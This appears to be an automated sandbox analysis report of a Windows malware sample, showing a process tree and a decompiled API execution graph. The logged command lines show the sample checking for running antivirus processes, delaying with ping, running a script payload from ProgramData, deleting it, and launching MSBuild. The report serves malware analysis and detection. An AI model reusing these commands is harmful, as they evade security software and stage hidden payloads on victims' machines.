                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff6cb810000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:20
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff6cb810000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:21
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:22
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:23
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:24
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff6cb810000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:26
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:27
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:28
                                                                                                                                                  Start time:05:50:03
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\hangbird\Updater.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
                                                                                                                                                  Imagebase:0xb20000
                                                                                                                                                  File size:943'784 bytes
                                                                                                                                                  MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:32
                                                                                                                                                  Start time:05:50:46
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:33
                                                                                                                                                  Start time:05:50:46
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:34
                                                                                                                                                  Start time:05:50:46
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:ping -n 5 127.0.0.1
                                                                                                                                                  Imagebase:0xed0000
                                                                                                                                                  File size:18'944 bytes
                                                                                                                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:35
                                                                                                                                                  Start time:05:50:50
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\hangbird\Updater.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:updater.exe C:\ProgramData\\bYrIyAT.a3x
                                                                                                                                                  Imagebase:0xb20000
                                                                                                                                                  File size:943'784 bytes
                                                                                                                                                  MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:36
                                                                                                                                                  Start time:05:50:54
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  Imagebase:0xe20000
                                                                                                                                                  File size:262'432 bytes
                                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                                                    Signature Coverage:8.5%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:65
                                                                                                                                                    execution_graph 116014 b21033 116019 b34e91 116014->116019 116018 b21042 116027 b2f38f 116019->116027 116023 b34f9c 116025 b21038 116023->116025 116035 b35bc6 21 API calls __fread_nolock 116023->116035 116026 b406d4 28 API calls __onexit 116025->116026 116026->116018 116036 b4045b 116027->116036 116029 b2f3a4 116046 b4042b 116029->116046 116031 b2f3b2 116032 b35c52 116031->116032 116071 b35c80 116032->116071 116035->116023 116038 b4042b 116036->116038 116039 b4044a 116038->116039 116042 b4044c 116038->116042 116056 b4e8ac 116038->116056 116063 b44dd8 7 API calls 2 library calls 116038->116063 116039->116029 116041 b40c79 116065 b4440c RaiseException 116041->116065 116042->116041 116064 b4440c RaiseException 116042->116064 116045 b40c96 116045->116029 116048 b40430 116046->116048 116047 b4e8ac ___std_exception_copy 20 API calls 116047->116048 116048->116047 116049 b4044a 116048->116049 116052 b4044c 116048->116052 116068 b44dd8 7 API calls 2 library calls 116048->116068 116049->116031 116051 b40c79 116070 b4440c RaiseException 116051->116070 116052->116051 116069 b4440c RaiseException 116052->116069 116055 b40c96 116055->116031 116061 b5282e pre_c_initialization 116056->116061 116057 b5286c 116067 b526cc 19 API calls __dosmaperr 116057->116067 116059 b52857 RtlAllocateHeap 116060 b5286a 116059->116060 116059->116061 116060->116038 116061->116057 116061->116059 116066 b44dd8 7 API calls 2 library calls 116061->116066 116063->116038 116064->116041 116065->116045 116066->116061 116067->116060 116068->116048 116069->116051 116070->116055 116072 b35c71 116071->116072 116073 b35c8d 116071->116073 116072->116023 116073->116072 116074 b35c94 RegOpenKeyExW 116073->116074 116074->116072 116075 b35cae RegQueryValueExW 116074->116075 116076 b35ce4 RegCloseKey 116075->116076 116077 b35ccf 116075->116077 116076->116072 116077->116076 118496 b63e53 118497 b63e5d 118496->118497 118499 b2381e messages 118496->118499 118524 b229d0 21 API calls messages 118497->118524 118507 b238bc 118499->118507 118525 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 118499->118525 118500 b23e3d 118528 b94358 81 API calls __wsopen_s 118500->118528 118503 b63fc6 118504 b2f38f 21 API calls 118503->118504 118503->118507 118505 b63fe0 118504->118505 118526 b406d4 28 API calls __onexit 118505->118526 118507->118500 118513 b23713 118507->118513 118508 b63fea 118527 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 118508->118527 118511 b643d3 118512 b2376c 118514 b642b9 118512->118514 118523 b237a6 messages 118512->118523 118513->118512 118513->118514 118518 b23c35 messages 118513->118518 118529 b94358 81 API calls __wsopen_s 118514->118529 118515 b24887 118519 b63cef 118515->118519 118522 b237bc messages 118515->118522 118515->118523 118516 b2415b 118517 b4042b 21 API calls 118516->118517 118517->118523 118518->118515 118518->118516 118518->118523 118521 b2fbc8 21 API calls 118519->118521 118519->118522 118520 b2fbc8 21 API calls 118520->118523 118521->118522 118523->118520 118523->118522 118524->118499 118525->118503 118526->118508 118527->118507 118528->118514 118529->118511 116078 b696f0 116079 b696fb 116078->116079 116089 b2a791 messages 116078->116089 116079->116079 116080 b2aa25 timeGetTime 116080->116089 116081 b4045b 21 API calls 116081->116089 116082 b2ab8d Sleep 116085 b2ab9e 116082->116085 116093 b2aba9 116082->116093 116083 b4042b 21 API calls 116083->116089 116084 b6a622 Sleep 116087 b6a633 116084->116087 116100 b6a63e 116084->116100 116205 b3fb90 timeGetTime 116085->116205 116225 b3fb90 timeGetTime 116087->116225 116088 b6986e timeGetTime 116206 b2362b 22 API calls 116088->116206 116089->116080 116089->116081 116089->116082 116089->116083 116089->116084 116089->116088 116096 b69a6e Sleep 116089->116096 116111 b2a9d3 messages 116089->116111 116118 b6991a 116089->116118 116124 b2aad7 116089->116124 116127 b6971d TranslateAcceleratorW 116089->116127 116133 b2ab6f TranslateMessage DispatchMessageW 116089->116133 116140 b27d70 116089->116140 116147 b27ff0 116089->116147 116171 b28e00 116089->116171 116200 b359e7 116089->116200 116207 b94636 21 API calls 116089->116207 116208 bb34d5 21 API calls 116089->116208 116209 b2362b 22 API calls 116089->116209 116092 b6a689 116099 b6a6b9 GetExitCodeProcess 116092->116099 116108 b6a6ff 116092->116108 116092->116111 116097 b6a501 116093->116097 116098 b6a50a 116093->116098 116110 b2ac34 116093->116110 116093->116111 116113 b6a508 116093->116113 116096->116111 116221 bb32dd GetForegroundWindow 116097->116221 116222 bb32dd GetForegroundWindow 116098->116222 116106 b6a6e5 CloseHandle 116099->116106 116107 b6a6cf WaitForSingleObject 116099->116107 116100->116092 116100->116111 116226 b8e2ab 45 API calls 116100->116226 116106->116108 116107->116106 116107->116111 116109 b6a740 Sleep 116108->116109 116109->116111 116110->116111 116113->116110 116113->116111 116114 b6a5f5 116113->116114 116223 b804cb 21 API calls 116113->116223 116224 b8f7f5 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 116114->116224 116210 b2fa3b 116118->116210 116220 b94358 81 API calls __wsopen_s 116124->116220 116126 b6996b 116129 b2fa3b 21 API calls 116126->116129 116127->116089 116128 b69736 116127->116128 116131 b699ad 116129->116131 116217 b221b0 39 API calls 116131->116217 116133->116089 116134 b699c9 116135 b2fa3b 21 API calls 116134->116135 116136 b69a0b 116135->116136 116218 b221b0 39 API calls 116136->116218 116138 b69a27 116219 b94636 21 API calls 116138->116219 116141 b27da3 116140->116141 116142 b27d8f 116140->116142 116228 b94358 81 API calls __wsopen_s 116141->116228 116227 b27870 93 API calls 2 library calls 116142->116227 116144 b27d9a 116144->116089 116146 b67c61 116146->116146 116148 b28030 116147->116148 116149 b28095 116148->116149 116150 b67c66 116148->116150 116168 b280fc messages 116149->116168 116239 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116149->116239 116150->116168 116238 b94358 81 API calls __wsopen_s 116150->116238 116154 b67cb6 116156 b2f38f 21 API calls 116154->116156 116154->116168 116155 b2f38f 21 API calls 116155->116168 116159 b67cd0 116156->116159 116240 b406d4 28 API calls __onexit 116159->116240 116162 b67cda 116241 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116162->116241 116166 b22510 21 API calls 116166->116168 116167 b28401 116167->116089 116168->116155 116168->116166 116168->116167 116169 b94358 81 API calls 116168->116169 116229 b2fbc8 116168->116229 116233 b21d83 116168->116233 116237 b26394 92 API calls 116168->116237 116242 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116168->116242 116243 b406d4 28 API calls __onexit 116168->116243 116244 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116168->116244 116245 ba7497 93 API calls 116168->116245 116169->116168 116172 b2908a 116171->116172 116190 b28e62 116171->116190 116296 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116172->116296 116174 b68b44 116298 ba7c74 165 API calls 116174->116298 116175 b28e6e 116247 b35eb0 116175->116247 116177 b29094 116180 b2fa3b 21 API calls 116177->116180 116177->116190 116184 b290b2 116180->116184 116182 b28e9f 116183 b35eb0 9 API calls 116182->116183 116195 b2903a 116182->116195 116185 b28eb3 116183->116185 116297 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116184->116297 116186 b68b54 116185->116186 116188 b35eb0 9 API calls 116185->116188 116186->116195 116299 b94358 81 API calls __wsopen_s 116186->116299 116191 b28ecc 116188->116191 116190->116174 116190->116175 116191->116186 116192 b28f5d 116191->116192 116193 b35eb0 9 API calls 116192->116193 116194 b28f70 116193->116194 116270 b2c263 116194->116270 116288 b9fc5b 116194->116288 116195->116089 116197 b28f8c messages 116197->116195 116295 b229d0 21 API calls messages 116197->116295 116201 b35a2b 116200->116201 116202 b359f9 116200->116202 116201->116089 116202->116201 116203 b35a1e IsDialogMessageW 116202->116203 116204 b79c70 GetClassLongW 116202->116204 116203->116201 116203->116202 116204->116202 116204->116203 116205->116093 116206->116089 116207->116089 116208->116089 116209->116089 116211 b2fa4a _wcslen 116210->116211 116212 b4045b 21 API calls 116211->116212 116213 b2fa72 __fread_nolock 116212->116213 116214 b4042b 21 API calls 116213->116214 116215 b2fa88 116214->116215 116216 b221b0 39 API calls 116215->116216 116216->116126 116217->116134 116218->116138 116219->116111 116220->116111 116221->116113 116222->116113 116223->116114 116224->116110 116225->116100 116226->116092 116227->116144 116228->116146 116230 b2fbeb __fread_nolock 116229->116230 116231 b2fbdc 116229->116231 116230->116168 116231->116230 116232 b4045b 21 API calls 116231->116232 116232->116230 116234 b21d8e 116233->116234 116235 b21dbd 116234->116235 116246 b221b0 39 API calls 116234->116246 116235->116168 116237->116168 116238->116168 116239->116154 116240->116162 116241->116168 116242->116168 116243->116168 116244->116168 116245->116168 116246->116235 116248 b35edd 116247->116248 116252 b28e7a 116247->116252 116300 b40854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116248->116300 116250 b35ee7 116250->116252 116301 b4080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116250->116301 116253 b28c60 116252->116253 116254 b68a9a 116253->116254 116257 b28c8c 116253->116257 116255 b68aab 116254->116255 116303 b94358 81 API calls __wsopen_s 116254->116303 116255->116182 116258 b68abf 116257->116258 116265 b28cca __fread_nolock 116257->116265 116304 b94358 81 API calls __wsopen_s 116258->116304 116259 b28d99 116261 b28dac 116259->116261 116302 ba630a 53 API calls _wcslen 116259->116302 116261->116182 116263 b4042b 21 API calls 116263->116265 116264 b4045b 21 API calls 116264->116265 116265->116259 116265->116261 116265->116263 116265->116264 116266 b68b03 116265->116266 116268 b68b19 116265->116268 116305 b2914c 93 API calls 116266->116305 116268->116261 116306 b94358 81 API calls __wsopen_s 116268->116306 116271 b2c296 116270->116271 116287 b2c333 116270->116287 116272 b2c2a6 116271->116272 116358 b2334c 116271->116358 116274 b2c2b9 116272->116274 116275 b2334c 38 API calls 116272->116275 116276 b2c2cc 116274->116276 116277 b2334c 38 API calls 116274->116277 116275->116274 116278 b2c2df 116276->116278 116279 b2334c 38 API calls 116276->116279 116277->116276 116280 b2c2f2 116278->116280 116281 b2334c 38 API calls 116278->116281 116279->116278 116282 b2c305 116280->116282 116283 b2334c 38 API calls 116280->116283 116281->116280 116307 b2304c 116282->116307 116283->116282 116287->116197 116289 b2304c 52 API calls 116288->116289 116290 b9fc95 116289->116290 116404 b2fe70 116290->116404 116292 b9fca5 116294 b9fcce 116292->116294 116432 b232c3 116292->116432 116294->116197 116295->116197 116296->116177 116297->116190 116298->116186 116299->116195 116300->116250 116301->116252 116302->116261 116303->116255 116304->116261 116305->116268 116306->116261 116308 b23063 116307->116308 116309 b2305e 116307->116309 116310 b2306b 116308->116310 116311 b23099 116308->116311 116330 b351fb 116309->116330 116362 b450f1 25 API calls 116310->116362 116312 b62e83 116311->116312 116316 b230ab 116311->116316 116322 b62d8c 116311->116322 116365 b450ae 25 API calls 116312->116365 116314 b2307b 116319 b4042b 21 API calls 116314->116319 116363 b4016e 50 API calls 116316->116363 116317 b62e9b 116317->116317 116321 b23085 116319->116321 116323 b2fa3b 21 API calls 116321->116323 116324 b4045b 21 API calls 116322->116324 116329 b62e05 116322->116329 116323->116309 116325 b62dd5 116324->116325 116326 b4042b 21 API calls 116325->116326 116327 b62dfc 116326->116327 116328 b2fa3b 21 API calls 116327->116328 116328->116329 116364 b4016e 50 API calls 116329->116364 116331 b4042b 21 API calls 116330->116331 116332 b3520e 116331->116332 116366 b35d68 116332->116366 116336 b35240 116338 b35435 116336->116338 116339 b352f5 116336->116339 116340 b352c8 SystemParametersInfoW GetSystemMetrics 116336->116340 116343 b78df5 GetWindowRect GetClientRect GetSystemMetrics GetSystemMetrics 116338->116343 116344 b78dbb 116338->116344 116357 b35441 116338->116357 116395 b34e5a 116338->116395 116341 b35341 SetRect AdjustWindowRectEx CreateWindowExW 116339->116341 116342 b352fb SystemParametersInfoW GetSystemMetrics 116339->116342 116340->116339 116341->116338 116346 b353a2 SetWindowLongW GetClientRect GetStockObject SendMessageW 116341->116346 116342->116341 116345 b35330 GetSystemMetrics 116342->116345 116343->116344 116347 b78e47 GetSystemMetrics 116343->116347 116344->116338 116349 b78e7e 116344->116349 116394 bb8251 GetWindowLongW DestroyWindow 116344->116394 116345->116341 116373 b34b74 GetCursorPos ScreenToClient 116346->116373 116347->116344 116398 b3544c 39 API calls 116349->116398 116353 b78e87 116353->116353 116354 b35407 SetTimer 116355 b3541d 116354->116355 116393 b35915 GetWindowLongW 116355->116393 116357->116287 116359 b2335d 116358->116359 116360 b23364 116358->116360 116359->116360 116403 b461fc 38 API calls 116359->116403 116360->116272 116362->116314 116363->116314 116364->116312 116365->116317 116367 b2f38f 21 API calls 116366->116367 116368 b35d95 116367->116368 116369 b2f38f 21 API calls 116368->116369 116370 b35dc3 116369->116370 116371 b2f38f 21 API calls 116370->116371 116372 b35216 116370->116372 116371->116370 116372->116336 116387 b32960 116372->116387 116374 b34bbd 116373->116374 116375 b34bc5 GetAsyncKeyState GetAsyncKeyState 116374->116375 116399 bb360f 21 API calls 116374->116399 116379 b34c11 116375->116379 116380 b78c05 116375->116380 116377 b78c00 116377->116375 116378 b34c29 116378->116354 116378->116355 116379->116378 116402 bb360f 21 API calls 116379->116402 116380->116379 116381 b78c2c 116380->116381 116400 bb360f 21 API calls 116380->116400 116401 bb360f 21 API calls 116381->116401 116383 b78c37 116383->116379 116386 b78c40 GetWindowLongW 116383->116386 116386->116381 116388 b32972 116387->116388 116392 b32991 __fread_nolock 116387->116392 116391 b4045b 21 API calls 116388->116391 116389 b4042b 21 API calls 116390 b329a8 116389->116390 116390->116336 116391->116392 116392->116389 116393->116338 116394->116338 116396 b34e68 GetWindowLongW 116395->116396 116397 b34e76 116395->116397 116396->116397 116397->116338 116398->116353 116399->116377 116400->116383 116401->116379 116402->116378 116403->116360 116446 b2f6d1 116404->116446 116406 b300bb 116459 b31323 21 API calls __fread_nolock 116406->116459 116410 b300d5 116410->116292 116411 b2f9fa 21 API calls 116430 b2fe95 __fread_nolock 116411->116430 116412 b7664c 116463 b8a4b0 83 API calls __wsopen_s 116412->116463 116413 b76467 116420 b4042b 21 API calls 116413->116420 116414 b31323 21 API calls 116414->116430 116415 b304cd 116415->116410 116465 b8a4b0 83 API calls __wsopen_s 116415->116465 116419 b7665a 116464 b31323 21 API calls __fread_nolock 116419->116464 116422 b7653d 116420->116422 116424 b4045b 21 API calls 116422->116424 116423 b76670 116423->116410 116431 b7657a __fread_nolock 116424->116431 116427 b30089 CharUpperBuffW 116458 b3146a 21 API calls 116427->116458 116428 b4045b 21 API calls 116428->116430 116430->116406 116430->116411 116430->116412 116430->116413 116430->116414 116430->116415 116430->116428 116430->116431 116451 b320c0 40 API calls _wcslen 116430->116451 116452 b2faa1 116430->116452 116460 b2fcc7 22 API calls __fread_nolock 116430->116460 116461 b2f5c0 21 API calls __fread_nolock 116430->116461 116462 b3146a 21 API calls 116430->116462 116431->116412 116431->116415 116433 b232d3 116432->116433 116434 b6304d 116432->116434 116439 b4042b 21 API calls 116433->116439 116435 b6305e 116434->116435 116466 b2f82c 116434->116466 116478 b2f9fa 116435->116478 116438 b63068 116438->116438 116440 b232e6 116439->116440 116441 b23301 116440->116441 116442 b232ef 116440->116442 116444 b2f38f 21 API calls 116441->116444 116443 b2fa3b 21 API calls 116442->116443 116445 b232f7 116443->116445 116444->116445 116445->116294 116447 b4045b 21 API calls 116446->116447 116448 b2f6f6 116447->116448 116449 b4042b 21 API calls 116448->116449 116450 b2f704 116449->116450 116450->116430 116451->116430 116453 b2fab4 116452->116453 116457 b2fab1 __fread_nolock 116452->116457 116454 b4042b 21 API calls 116453->116454 116455 b2fabf 116454->116455 116456 b4045b 21 API calls 116455->116456 116456->116457 116457->116427 116458->116430 116459->116410 116460->116430 116461->116430 116462->116430 116463->116419 116464->116423 116465->116410 116467 b2f83c _wcslen 116466->116467 116468 b76258 116466->116468 116471 b2f852 116467->116471 116472 b2f877 116467->116472 116485 b2f9a0 116468->116485 116470 b76261 116470->116470 116484 b2fb74 21 API calls 116471->116484 116474 b4042b 21 API calls 116472->116474 116475 b2f883 116474->116475 116477 b4045b 21 API calls 116475->116477 116476 b2f85a __fread_nolock 116476->116435 116477->116476 116479 